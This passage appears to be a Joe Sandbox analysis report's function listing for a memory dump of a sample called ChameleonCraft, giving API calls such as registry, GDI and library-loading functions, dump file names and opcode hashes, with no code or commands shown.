                                                          • Snapshot File: hcaresult_23_2_9a0000_ChameleonCraft.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: NULL Pointer assignment$Not an Object type
                                                          • API String ID: 0-572801152
                                                          • Opcode ID: 5a42e2e42bb78a68f9bfaf52fbe6cfbd8ee45b6ac82dbb691318d4bc11bddf12
                                                          • Instruction ID: 7771735ecdca524ffb8b00d57e0fabe271e4624024e42c3fcda50adc8f610b9b
                                                          • Opcode Fuzzy Hash: 5a42e2e42bb78a68f9bfaf52fbe6cfbd8ee45b6ac82dbb691318d4bc11bddf12
                                                          • Instruction Fuzzy Hash: A3C19271A0121A9FDF10CFA8C884BEEB7B6FF58350F148469E915AB280E770DD85CB51
                                                          Function 00A20371 Relevance: 12.3, APIs: 8, Instructions: 256registryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 009B1A36: _memmove.LIBCMT ref: 009B1A77
                                                            • Part of subcall function 00A2147A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00A2040D,?,?), ref: 00A21491
                                                          • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00A2044E
                                                          Memory Dump Source
                                                          • Source File: 00000017.00000002.2713975732.00000000009A1000.00000020.00000001.01000000.00000008.sdmp, Offset: 009A0000, based on PE: true
                                                          • Associated: 00000017.00000002.2713893819.00000000009A0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000017.00000002.2714058891.0000000000A30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000017.00000002.2714058891.0000000000A56000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000017.00000002.2714126128.0000000000A60000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000017.00000002.2714126128.0000000000A64000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000017.00000002.2714186565.0000000000A69000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_23_2_9a0000_ChameleonCraft.jbxd
                                                          Similarity
                                                          • API ID: BuffCharConnectRegistryUpper_memmove
                                                          • String ID:
                                                          • API String ID: 3479070676-0
                                                          • Opcode ID: e50e9e0a3bf2216ea8883f759f7bfb93ad41ad92f892ed9f231b3851f70cc6ad
                                                          • Instruction ID: a6b5904a4c5340220340ebc33fc2d39e014c4b51a0dd9659bee4a4786658b951
                                                          • Opcode Fuzzy Hash: e50e9e0a3bf2216ea8883f759f7bfb93ad41ad92f892ed9f231b3851f70cc6ad
                                                          • Instruction Fuzzy Hash: 56A18A302042159FCB14EF68D891F6EBBE5AF84314F14892DF5968B2A2DB71E945CF82
                                                          Function 009FE287 Relevance: 10.6, APIs: 7, Instructions: 95COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 009FE2CA
                                                          • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 009FE2F0
                                                          • #2.WSOCK32(00000000), ref: 009FE2F3
                                                          • #2.WSOCK32(?), ref: 009FE311
                                                          • #6.OLEAUT32(?), ref: 009FE31A
                                                          • StringFromGUID2.OLE32(?,?,00000028), ref: 009FE33F
                                                          • #2.WSOCK32(?), ref: 009FE34D
                                                          Memory Dump Source
                                                          • Source File: 00000017.00000002.2713975732.00000000009A1000.00000020.00000001.01000000.00000008.sdmp, Offset: 009A0000, based on PE: true
                                                          • Associated: 00000017.00000002.2713893819.00000000009A0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000017.00000002.2714058891.0000000000A30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000017.00000002.2714058891.0000000000A56000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000017.00000002.2714126128.0000000000A60000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000017.00000002.2714126128.0000000000A64000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000017.00000002.2714186565.0000000000A69000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_23_2_9a0000_ChameleonCraft.jbxd
                                                          Similarity
                                                          • API ID: ByteCharMultiWide$FromString
                                                          • String ID:
                                                          • API String ID: 1211328463-0
                                                          • Opcode ID: 44eb697bfae8786245d680da02cdf911c1d9145a5ba16f5b1c0b7efa35637c27
                                                          • Instruction ID: 50396fad026c91bc94c788a03f599ae4a5ccbd7c1f10a08398a8a9ecc08fe065
                                                          • Opcode Fuzzy Hash: 44eb697bfae8786245d680da02cdf911c1d9145a5ba16f5b1c0b7efa35637c27
                                                          • Instruction Fuzzy Hash: 6721927660421DAF9F10DFA8DC88DBF77ACEB09360B048529FA14DB260D674AD418760
                                                          Function 009FE360 Relevance: 10.6, APIs: 7, Instructions: 90COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 009FE3A5
                                                          • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 009FE3CB
                                                          • #2.WSOCK32(00000000), ref: 009FE3CE
                                                          • #2.WSOCK32 ref: 009FE3EF
                                                          • #6.OLEAUT32 ref: 009FE3F8
                                                          • StringFromGUID2.OLE32(?,?,00000028), ref: 009FE412
                                                          • #2.WSOCK32(?), ref: 009FE420
                                                          Memory Dump Source
                                                          • Source File: 00000017.00000002.2713975732.00000000009A1000.00000020.00000001.01000000.00000008.sdmp, Offset: 009A0000, based on PE: true
                                                          • Associated: 00000017.00000002.2713893819.00000000009A0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000017.00000002.2714058891.0000000000A30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000017.00000002.2714058891.0000000000A56000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000017.00000002.2714126128.0000000000A60000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000017.00000002.2714126128.0000000000A64000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000017.00000002.2714186565.0000000000A69000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_23_2_9a0000_ChameleonCraft.jbxd
                                                          Similarity
                                                          • API ID: ByteCharMultiWide$FromString
                                                          • String ID:
                                                          • API String ID: 1211328463-0
                                                          • Opcode ID: f6424401e1ed0c63dc3c506973348fa88a04b7792af4ff79ad8e88aa1f753d9f
                                                          • Instruction ID: 95765062b32f8134e938fc2649ffc77b5ccd84fac54e71c5915c185a0eeaf690
                                                          • Opcode Fuzzy Hash: f6424401e1ed0c63dc3c506973348fa88a04b7792af4ff79ad8e88aa1f753d9f
                                                          • Instruction Fuzzy Hash: F9215635604208AFAB10DFB8DC89DBF77ECEB49360B008529FA15CB2B1D674ED418B64
                                                          Function 009C41B9 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 24libraryloaderCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoInitialize,009C4282,?), ref: 009C41D3
                                                          • GetProcAddress.KERNEL32(00000000), ref: 009C41DA
                                                          • EncodePointer.KERNEL32(00000000), ref: 009C41E6
                                                          • DecodePointer.KERNEL32(00000001,009C4282,?), ref: 009C4203
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000017.00000002.2713975732.00000000009A1000.00000020.00000001.01000000.00000008.sdmp, Offset: 009A0000, based on PE: true
                                                          • Associated: 00000017.00000002.2713893819.00000000009A0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000017.00000002.2714058891.0000000000A30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000017.00000002.2714058891.0000000000A56000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000017.00000002.2714126128.0000000000A60000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000017.00000002.2714126128.0000000000A64000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000017.00000002.2714186565.0000000000A69000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_23_2_9a0000_ChameleonCraft.jbxd
                                                          Similarity
                                                          • API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
                                                          • String ID: RoInitialize$combase.dll
                                                          • API String ID: 3489934621-340411864
                                                          • Opcode ID: 2fe32611bbb1d433c739b6d309d2d471708eb1213dba4e2d7389fdde31ae73dd
                                                          • Instruction ID: e51bd878b32e0ea0498a1173ab94f9808fbb944dcec7bf4e5fd6f9ec419d5818
                                                          • Opcode Fuzzy Hash: 2fe32611bbb1d433c739b6d309d2d471708eb1213dba4e2d7389fdde31ae73dd
                                                          • Instruction Fuzzy Hash: 66E01A70A94701AFEF50AFF0EC5DF483A68B712B06F605A28F541D90A0CBF941868F00
                                                          Function 009C428E Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 19libraryloaderCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoUninitialize,009C41A8), ref: 009C42A8
                                                          • GetProcAddress.KERNEL32(00000000), ref: 009C42AF
                                                          • EncodePointer.KERNEL32(00000000), ref: 009C42BA
                                                          • DecodePointer.KERNEL32(009C41A8), ref: 009C42D5
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000017.00000002.2713975732.00000000009A1000.00000020.00000001.01000000.00000008.sdmp, Offset: 009A0000, based on PE: true
                                                          • Associated: 00000017.00000002.2713893819.00000000009A0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000017.00000002.2714058891.0000000000A30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000017.00000002.2714058891.0000000000A56000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000017.00000002.2714126128.0000000000A60000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000017.00000002.2714126128.0000000000A64000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000017.00000002.2714186565.0000000000A69000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_23_2_9a0000_ChameleonCraft.jbxd
                                                          Similarity
                                                          • API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
                                                          • String ID: RoUninitialize$combase.dll
                                                          • API String ID: 3489934621-2819208100
                                                          • Opcode ID: a03beb507fcdff5d6db813ef1b68b5fbfaa286442dd66fb4c5bf246421a0020a
                                                          • Instruction ID: 70fbbf2c86d9c3ec4560cf79831a9ca46b3d0e553ba2778fbe2aa8a2443d756d
                                                          • Opcode Fuzzy Hash: a03beb507fcdff5d6db813ef1b68b5fbfaa286442dd66fb4c5bf246421a0020a
                                                          • Instruction Fuzzy Hash: D7E0BDB0A94B00ABEB50EFF1AD2EF453AB8BB01B42F500A18F141E94A0CBF44606CB10
                                                          Function 009A218F Relevance: 9.3, APIs: 6, Instructions: 254COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetClientRect.USER32(?,?), ref: 009A21B8
                                                          • GetWindowRect.USER32(?,?), ref: 009A21F9
                                                          • ScreenToClient.USER32(?,?), ref: 009A2221
                                                          • GetClientRect.USER32(?,?), ref: 009A2350
                                                          • GetWindowRect.USER32(?,?), ref: 009A2369
                                                          Memory Dump Source
                                                          • Source File: 00000017.00000002.2713975732.00000000009A1000.00000020.00000001.01000000.00000008.sdmp, Offset: 009A0000, based on PE: true
                                                          • Associated: 00000017.00000002.2713893819.00000000009A0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000017.00000002.2714058891.0000000000A30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000017.00000002.2714058891.0000000000A56000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000017.00000002.2714126128.0000000000A60000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000017.00000002.2714126128.0000000000A64000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000017.00000002.2714186565.0000000000A69000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_23_2_9a0000_ChameleonCraft.jbxd
                                                          Similarity
                                                          • API ID: Rect$Client$Window$Screen
                                                          • String ID:
                                                          • API String ID: 1296646539-0
                                                          • Opcode ID: bd3c795980be153f36b7df094f46a686cc13e5b91f792bf5e5edbf39ef8b987b
                                                          • Instruction ID: c1e0aa833f395d34717fa7b7320aa40ca2f74d85cf750bef89e0aa447268adde
                                                          • Opcode Fuzzy Hash: bd3c795980be153f36b7df094f46a686cc13e5b91f792bf5e5edbf39ef8b987b
                                                          • Instruction Fuzzy Hash: 2AB15C39900249DBDF14CFA8C9807EDB7B5FF09710F14852AED59AB254DB34AA50CBA4
                                                          Function 009FC329 Relevance: 9.0, APIs: 6, Instructions: 49COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetDC.USER32(00000000,?,?,?,80004003), ref: 009FC34E
                                                          • GetDeviceCaps.GDI32(00000000,00000058,?,?,80004003), ref: 009FC35F
                                                          • GetDeviceCaps.GDI32(00000000,0000005A,?,?,80004003), ref: 009FC366
                                                          • ReleaseDC.USER32(00000000,00000000,?,?,80004003), ref: 009FC36E
                                                          • MulDiv.KERNEL32(000009EC,?,00000000), ref: 009FC385
                                                          • MulDiv.KERNEL32(000009EC,?,?), ref: 009FC397
                                                          Memory Dump Source
                                                          • Source File: 00000017.00000002.2713975732.00000000009A1000.00000020.00000001.01000000.00000008.sdmp, Offset: 009A0000, based on PE: true
                                                          • Associated: 00000017.00000002.2713893819.00000000009A0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000017.00000002.2714058891.0000000000A30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000017.00000002.2714058891.0000000000A56000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000017.00000002.2714126128.0000000000A60000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000017.00000002.2714126128.0000000000A64000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000017.00000002.2714186565.0000000000A69000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_23_2_9a0000_ChameleonCraft.jbxd
                                                          Similarity
                                                          • API ID: CapsDevice$Release
                                                          • String ID:
                                                          • API String ID: 1035833867-0
                                                          • Opcode ID: 78f33529b3c56c0482c6b15a052e5cae9719abd32bdff3d8424de56915066a79
                                                          • Instruction ID: ef689f9f1c776d4ea64e631b63d04de452ce21e239b10878f011cf82ef5ebd1f
                                                          • Opcode Fuzzy Hash: 78f33529b3c56c0482c6b15a052e5cae9719abd32bdff3d8424de56915066a79
                                                          • Instruction Fuzzy Hash: 340121B5E00219BBEF109BE59D49E5ABFA8EB48751F004065FA04A7280D6709911CFA1
                                                          Function 00A2C552 Relevance: 9.0, APIs: 6, Instructions: 49COMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 009A16CF: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 009A1729
                                                            • Part of subcall function 009A16CF: SelectObject.GDI32(?,00000000), ref: 009A1738
                                                            • Part of subcall function 009A16CF: BeginPath.GDI32(?), ref: 009A174F
                                                            • Part of subcall function 009A16CF: SelectObject.GDI32(?,00000000,000000FF,00000000), ref: 009A1778
                                                          • MoveToEx.GDI32(00000000,-00000002,?,00000000,00000000,00000000,000000FF,00000000,00000001,?,?,?,00A2C498,00000000), ref: 00A2C57C
                                                          • LineTo.GDI32(00000000,00000003,?,?,00A2C498,00000000), ref: 00A2C590
                                                          • MoveToEx.GDI32(00000000,00000000,?,00000000,?,00A2C498,00000000), ref: 00A2C59E
                                                          • LineTo.GDI32(00000000,00000000,?,?,00A2C498,00000000), ref: 00A2C5AE
                                                          • EndPath.GDI32(00000000,00000000), ref: 00A2C5BE
                                                          • StrokePath.GDI32(00000000,00000000), ref: 00A2C5CE
                                                          Memory Dump Source
                                                          • Source File: 00000017.00000002.2713975732.00000000009A1000.00000020.00000001.01000000.00000008.sdmp, Offset: 009A0000, based on PE: true
                                                          • Associated: 00000017.00000002.2713893819.00000000009A0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000017.00000002.2714058891.0000000000A30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000017.00000002.2714058891.0000000000A56000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000017.00000002.2714126128.0000000000A60000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000017.00000002.2714126128.0000000000A64000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000017.00000002.2714186565.0000000000A69000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_23_2_9a0000_ChameleonCraft.jbxd
                                                          Similarity
                                                          • API ID: Path$LineMoveObjectSelect$BeginCreateStroke
                                                          • String ID:
                                                          • API String ID: 43455801-0
                                                          • Opcode ID: 185a22254fce9947ad0c387890c2e691d76b144bfa3ed23d0e55a96dc5de3d67
                                                          • Instruction ID: a01d5c9f9959b3c3791639c4a51cf6f5f79ce8c2a3ce7ba6776e7e7bcb7bb177
                                                          • Opcode Fuzzy Hash: 185a22254fce9947ad0c387890c2e691d76b144bfa3ed23d0e55a96dc5de3d67
                                                          • Instruction Fuzzy Hash: 51111B7204010CBFDF02DF94DC88FAA7FADEB08364F048121FA185A161C771AE96DBA0
                                                          Function 00A022E7 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 49COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • CharUpperBuffW.USER32(?,?), ref: 00A02318
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000017.00000002.2713975732.00000000009A1000.00000020.00000001.01000000.00000008.sdmp, Offset: 009A0000, based on PE: true
                                                          • Associated: 00000017.00000002.2713893819.00000000009A0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000017.00000002.2714058891.0000000000A30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000017.00000002.2714058891.0000000000A56000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000017.00000002.2714126128.0000000000A60000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000017.00000002.2714126128.0000000000A64000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000017.00000002.2714186565.0000000000A69000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_23_2_9a0000_ChameleonCraft.jbxd
                                                          Similarity
                                                          • API ID: BuffCharUpper
                                                          • String ID: APPEND$EXISTS$KEYS$REMOVE
                                                          • API String ID: 3964851224-769500911
                                                          • Opcode ID: 7730bee0818d1810d5e73cf5b5c49740beddbc65bc34d41621380fe352ebed7b
                                                          • Instruction ID: f42f8aec69cea247c16d29c72dbe5fd2aaaf675d1006525b34a3d28c6ec601bc
                                                          • Opcode Fuzzy Hash: 7730bee0818d1810d5e73cf5b5c49740beddbc65bc34d41621380fe352ebed7b
                                                          • Instruction Fuzzy Hash: E9118E3091021CDFCF00EFA4D955AEEB7B8FF55305F508168E81567291EB326E0ACB51
                                                          Function 00A20697 Relevance: 7.6, APIs: 5, Instructions: 144registryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 009B1A36: _memmove.LIBCMT ref: 009B1A77
                                                            • Part of subcall function 00A2147A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00A2040D,?,?), ref: 00A21491
                                                          • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00A2075D
                                                          • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00A2079C
                                                          • RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 00A207E3
                                                          • RegCloseKey.ADVAPI32(?,?), ref: 00A2080F
                                                          • RegCloseKey.ADVAPI32(00000000), ref: 00A2081C
                                                          Memory Dump Source
                                                          • Source File: 00000017.00000002.2713975732.00000000009A1000.00000020.00000001.01000000.00000008.sdmp, Offset: 009A0000, based on PE: true
                                                          • Associated: 00000017.00000002.2713893819.00000000009A0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000017.00000002.2714058891.0000000000A30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000017.00000002.2714058891.0000000000A56000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000017.00000002.2714126128.0000000000A60000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000017.00000002.2714126128.0000000000A64000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000017.00000002.2714186565.0000000000A69000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_23_2_9a0000_ChameleonCraft.jbxd
                                                          Similarity
                                                          • API ID: Close$BuffCharConnectEnumOpenRegistryUpper_memmove
                                                          • String ID:
                                                          • API String ID: 3440857362-0
                                                          • Opcode ID: 284799b6a957eb309b02c942181695930373c8440e03be07d02260482e69998a
                                                          • Instruction ID: 5e5ab8420bf33346093b48465d3e050bfc2bcc9a483ac17a11964d4126b3ab70
                                                          • Opcode Fuzzy Hash: 284799b6a957eb309b02c942181695930373c8440e03be07d02260482e69998a
                                                          • Instruction Fuzzy Hash: BE515771208204AFD704EB68D991F6BB7E9BF84714F00892DF595872A2DB30E905CB92
                                                          Function 00A2A67B Relevance: 7.6, APIs: 5, Instructions: 130COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000017.00000002.2713975732.00000000009A1000.00000020.00000001.01000000.00000008.sdmp, Offset: 009A0000, based on PE: true
                                                          • Associated: 00000017.00000002.2713893819.00000000009A0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000017.00000002.2714058891.0000000000A30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000017.00000002.2714058891.0000000000A56000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000017.00000002.2714126128.0000000000A60000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000017.00000002.2714126128.0000000000A64000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000017.00000002.2714186565.0000000000A69000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_23_2_9a0000_ChameleonCraft.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: edf46fe6dbfe660da035289ae89deed72a4ceb512bc4232bdd13a211681ffa67
                                                          • Instruction ID: 6b07361fe73d8d83f6bc0c334ebac1b84909723dfb999400b92b332bac61ee2e
                                                          • Opcode Fuzzy Hash: edf46fe6dbfe660da035289ae89deed72a4ceb512bc4232bdd13a211681ffa67
                                                          • Instruction Fuzzy Hash: F3411635900224AFD714DF6CEC88FAABBB9EB29310F140175F816E72D2C770AD42DA95
                                                          Function 00A16138 Relevance: 7.6, APIs: 5, Instructions: 70COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • IsWindow.USER32(00000000), ref: 00A16159
                                                          • GetForegroundWindow.USER32 ref: 00A16170
                                                          • GetDC.USER32(00000000), ref: 00A161AC
                                                          • GetPixel.GDI32(00000000,?,00000003), ref: 00A161B8
                                                          • ReleaseDC.USER32(00000000,00000003), ref: 00A161F3
                                                          Memory Dump Source
                                                          • Source File: 00000017.00000002.2713975732.00000000009A1000.00000020.00000001.01000000.00000008.sdmp, Offset: 009A0000, based on PE: true
                                                          • Associated: 00000017.00000002.2713893819.00000000009A0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000017.00000002.2714058891.0000000000A30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000017.00000002.2714058891.0000000000A56000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000017.00000002.2714126128.0000000000A60000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000017.00000002.2714126128.0000000000A64000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000017.00000002.2714186565.0000000000A69000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_23_2_9a0000_ChameleonCraft.jbxd
                                                          Similarity
                                                          • API ID: Window$ForegroundPixelRelease
                                                          • String ID:
                                                          • API String ID: 4156661090-0
                                                          • Opcode ID: ce7bbc5d058b8b09a2cbfc0ca0645f6daecf93476e72972d3bfe4c7eaff504e9
                                                          • Instruction ID: 7f96ddc1262a892546a97b80b9217e7b2355d4a8037a4403f3c641a5851a8f28
                                                          • Opcode Fuzzy Hash: ce7bbc5d058b8b09a2cbfc0ca0645f6daecf93476e72972d3bfe4c7eaff504e9
                                                          • Instruction Fuzzy Hash: D921A175A00204AFD700EFA5DD95E9ABBF9EF88310F048469F94AD7252CB74AC41CB90
                                                          Function 009AE3C6 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 265COMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 009C0FE6: std::exception::exception.LIBCMT ref: 009C101C
                                                            • Part of subcall function 009C0FE6: __CxxThrowException@8.LIBCMT ref: 009C1031
                                                            • Part of subcall function 009B1A36: _memmove.LIBCMT ref: 009B1A77
                                                            • Part of subcall function 009B1680: _memmove.LIBCMT ref: 009B16DB
                                                          • __swprintf.LIBCMT ref: 009AE598
                                                          Strings
                                                          • \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 009AE431
                                                          Memory Dump Source
                                                          • Source File: 00000017.00000002.2713975732.00000000009A1000.00000020.00000001.01000000.00000008.sdmp, Offset: 009A0000, based on PE: true
                                                          • Associated: 00000017.00000002.2713893819.00000000009A0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000017.00000002.2714058891.0000000000A30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000017.00000002.2714058891.0000000000A56000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000017.00000002.2714126128.0000000000A60000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000017.00000002.2714126128.0000000000A64000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000017.00000002.2714186565.0000000000A69000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_23_2_9a0000_ChameleonCraft.jbxd
                                                          Similarity
                                                          • API ID: _memmove$Exception@8Throw__swprintfstd::exception::exception
                                                          • String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
                                                          • API String ID: 1943609520-557222456
                                                          • Opcode ID: a37f9e6864f4460e3aba0b4c2f7f42c57ec393c26b93ce3faf0c9b72618117ff
                                                          • Instruction ID: 78d521712be943882c9f33ac8af1035281e3a5c3a5782d54499f42ec88d40e38
                                                          • Opcode Fuzzy Hash: a37f9e6864f4460e3aba0b4c2f7f42c57ec393c26b93ce3faf0c9b72618117ff
                                                          • Instruction Fuzzy Hash: 1491DE315082019FC714EF24D9A5EAFB7A8EFC6714F41491DF482872A2EB30EE44CB92
                                                          Function 009C0654 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 163COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000017.00000002.2713975732.00000000009A1000.00000020.00000001.01000000.00000008.sdmp, Offset: 009A0000, based on PE: true
                                                          • Associated: 00000017.00000002.2713893819.00000000009A0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000017.00000002.2714058891.0000000000A30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000017.00000002.2714058891.0000000000A56000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000017.00000002.2714126128.0000000000A60000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000017.00000002.2714126128.0000000000A64000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000017.00000002.2714186565.0000000000A69000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_23_2_9a0000_ChameleonCraft.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: #$+
                                                          • API String ID: 0-2552117581
                                                          • Opcode ID: ba3b9f8a1a0b135653ee14132364700fbb8616d6d2e6556cc585f0ad89606577
                                                          • Instruction ID: 8fc50d8f57e9f7a8a6b5b090fbd6bfb657008d3776962819110d0027a9d28fb8
